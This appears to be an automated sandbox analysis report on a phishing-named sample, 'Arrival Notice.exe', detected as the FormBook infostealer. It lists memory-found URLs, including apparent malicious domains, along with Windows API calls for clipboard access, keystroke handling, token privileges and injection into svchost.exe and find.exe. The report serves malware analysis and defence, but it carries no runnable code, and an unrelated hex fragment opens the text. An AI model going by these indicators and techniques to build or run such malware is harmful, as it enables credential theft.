69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6

Source: fXkDwRWxFFQGfp.exe, 0000000C.00000002.3757179262.0000000005557000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.basicreviews.online
Source: find.exe, 0000000A.00000002.3755675493.0000000004EF0000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000004AA0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM
Source: fXkDwRWxFFQGfp.exe, 0000000C.00000002.3757179262.0000000005557000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.basicreviews.online/cop9/
Source: find.exe, 0000000A.00000002.3755675493.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003FA2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.jigg.space/ezhm?gp=1&js=1&uuid=1731394600.0005327985&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiY
Source: fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003FA2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.jigg.space/
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: find.exe, 0000000A.00000002.3749879419.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: find.exe, 0000000A.00000002.3749879419.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: find.exe, 0000000A.00000002.3749879419.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: find.exe, 0000000A.00000002.3749879419.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: find.exe, 0000000A.00000002.3749879419.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: find.exe, 0000000A.00000002.3749879419.0000000002A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: find.exe, 0000000A.00000003.1688740684.00000000079AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: find.exe, 0000000A.00000002.3755675493.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003636000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.000000000477C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046DC80

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,

0_2_0044C37A

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0047C81C

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3746964118.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1492845743.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754741570.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3757179262.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1493958694.0000000003530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3754536701.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1494766146.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3754584552.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Arrival Notice.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042C7F3 NtClose,	7_2_0042C7F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872B60 NtClose,LdrInitializeThunk,	7_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038735C0 NtCreateMutant,LdrInitializeThunk,	7_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03874340 NtSetContextThread,	7_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03874650 NtSuspendThread,	7_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872B80 NtQueryInformationFile,	7_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872BA0 NtEnumerateValueKey,	7_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872BE0 NtQueryValueKey,	7_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872BF0 NtAllocateVirtualMemory,	7_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872AB0 NtWaitForSingleObject,	7_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872AD0 NtReadFile,	7_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872AF0 NtWriteFile,	7_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872F90 NtProtectVirtualMemory,	7_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872FA0 NtQuerySection,	7_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872FB0 NtResumeThread,	7_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872FE0 NtCreateFile,	7_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872F30 NtCreateSection,	7_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872F60 NtCreateProcessEx,	7_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872E80 NtReadVirtualMemory,	7_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872EA0 NtAdjustPrivilegesToken,	7_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872EE0 NtQueueApcThread,	7_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872E30 NtWriteVirtualMemory,	7_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872DB0 NtEnumerateKey,	7_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872DD0 NtDelayExecution,	7_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872D00 NtSetInformationFile,	7_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872D10 NtMapViewOfSection,	7_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872D30 NtUnmapViewOfSection,	7_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872CA0 NtQueryInformationToken,	7_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872CC0 NtQueryVirtualMemory,	7_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872CF0 NtOpenProcess,	7_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872C00 NtQueryInformationProcess,	7_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03872C60 NtCreateKey,	7_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03873090 NtSetValueKey,	7_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03873010 NtOpenDirectoryObject,	7_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038739B0 NtGetContextThread,	7_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03873D10 NtOpenProcessToken,	7_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03873D70 NtOpenThread,	7_2_03873D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F54340 NtSetContextThread,LdrInitializeThunk,	10_2_02F54340
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F54650 NtSuspendThread,LdrInitializeThunk,	10_2_02F54650
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52AF0 NtWriteFile,LdrInitializeThunk,	10_2_02F52AF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52AD0 NtReadFile,LdrInitializeThunk,	10_2_02F52AD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_02F52BF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52BE0 NtQueryValueKey,LdrInitializeThunk,	10_2_02F52BE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52BA0 NtEnumerateValueKey,LdrInitializeThunk,	10_2_02F52BA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52B60 NtClose,LdrInitializeThunk,	10_2_02F52B60
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52EE0 NtQueueApcThread,LdrInitializeThunk,	10_2_02F52EE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52E80 NtReadVirtualMemory,LdrInitializeThunk,	10_2_02F52E80
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52FE0 NtCreateFile,LdrInitializeThunk,	10_2_02F52FE0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52FB0 NtResumeThread,LdrInitializeThunk,	10_2_02F52FB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52F30 NtCreateSection,LdrInitializeThunk,	10_2_02F52F30
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52CA0 NtQueryInformationToken,LdrInitializeThunk,	10_2_02F52CA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_02F52C70
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52C60 NtCreateKey,LdrInitializeThunk,	10_2_02F52C60
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_02F52DF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52DD0 NtDelayExecution,LdrInitializeThunk,	10_2_02F52DD0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52D30 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_02F52D30
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52D10 NtMapViewOfSection,LdrInitializeThunk,	10_2_02F52D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F535C0 NtCreateMutant,LdrInitializeThunk,	10_2_02F535C0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F539B0 NtGetContextThread,LdrInitializeThunk,	10_2_02F539B0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52AB0 NtWaitForSingleObject,	10_2_02F52AB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52B80 NtQueryInformationFile,	10_2_02F52B80
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52EA0 NtAdjustPrivilegesToken,	10_2_02F52EA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52E30 NtWriteVirtualMemory,	10_2_02F52E30
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52FA0 NtQuerySection,	10_2_02F52FA0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52F90 NtProtectVirtualMemory,	10_2_02F52F90
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52F60 NtCreateProcessEx,	10_2_02F52F60
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52CF0 NtOpenProcess,	10_2_02F52CF0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52CC0 NtQueryVirtualMemory,	10_2_02F52CC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52C00 NtQueryInformationProcess,	10_2_02F52C00
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52DB0 NtEnumerateKey,	10_2_02F52DB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F52D00 NtSetInformationFile,	10_2_02F52D00
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F53090 NtSetValueKey,	10_2_02F53090
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F53010 NtOpenDirectoryObject,	10_2_02F53010
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F53D70 NtOpenThread,	10_2_02F53D70
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02F53D10 NtOpenProcessToken,	10_2_02F53D10
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02569290 NtDeleteFile,	10_2_02569290
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02569330 NtClose,	10_2_02569330
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02569030 NtCreateFile,	10_2_02569030
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_025691A0 NtReadFile,	10_2_025691A0
Source: C:\Windows\SysWOW64\find.exe	Code function: 10_2_02569490 NtAllocateVirtualMemory,	10_2_02569490

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00431BE8

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00446313

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004333BE

Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0042200C	0_2_0042200C
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0041A217	0_2_0041A217
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00412216	0_2_00412216
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0042435D	0_2_0042435D
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004033C0	0_2_004033C0
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044F430	0_2_0044F430
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004125E8	0_2_004125E8
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044663B	0_2_0044663B
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004096A0	0_2_004096A0
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00413801	0_2_00413801
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0042096F	0_2_0042096F
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004129D0	0_2_004129D0
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_004119E3	0_2_004119E3
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0041C9AE	0_2_0041C9AE
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0047EA6F	0_2_0047EA6F
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044EB5F	0_2_0044EB5F
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00423C81	0_2_00423C81
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00411E78	0_2_00411E78
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00442E0C	0_2_00442E0C
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00420EC0	0_2_00420EC0
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_0044CF17	0_2_0044CF17
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_00444FD2	0_2_00444FD2
Source: C:\Users\user\Desktop\Arrival Notice.exe	Code function: 0_2_03C63648	0_2_03C63648
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00418903	7_2_00418903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004029D0	7_2_004029D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00410213	7_2_00410213
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00403215	7_2_00403215
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00403220	7_2_00403220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00416B53	7_2_00416B53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00410433	7_2_00410433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E4B3	7_2_0040E4B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402D81	7_2_00402D81
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402D90	7_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040264D	7_2_0040264D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402650	7_2_00402650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042EE03	7_2_0042EE03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384E3F0	7_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_039003E6	7_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FA352	7_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C02C0	7_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0274	7_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F41A2	7_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_039001AA	7_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F81CC	7_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830100	7_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DA118	7_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038C8158	7_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038D2000	7_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383C7C0	7_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03864750	7_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840770	7_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385C6E0	7_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03900591	7_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840535	7_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EE4F6	7_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E4420	7_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F2446	7_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F6BD7	7_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FAB40	7_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383EA80	7_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038429A0	7_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0390A9A6	7_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03856962	7_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038268B8	7_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0386E8F0	7_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384A840	7_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03842840	7_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038BEFA0	7_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03832FC8	7_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384CFE0	7_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03882F28	7_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03860F30	7_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E2F30	7_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038B4F40	7_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03852E90	7_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FCE93	7_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FEEDB	7_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FEE26	7_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840E59	7_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03858DBF	7_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0383ADE0	7_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384AD00	7_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DCD1F	7_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E0CB5	7_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03830CF2	7_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03840C00	7_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0388739A	7_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F132D	7_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382D34C	7_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038452A0	7_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0385B2C0	7_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038E12ED	7_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0384B1B0	7_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0387516C	7_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0382F172	7_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0390B16B	7_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038EF0CC	7_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038470C0	7_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F70E9	7_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FF0E0	7_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FF7B0	7_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F16CC	7_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038DD5B0	7_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038F7571	7_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_038FF43F	7_2_038FF43F
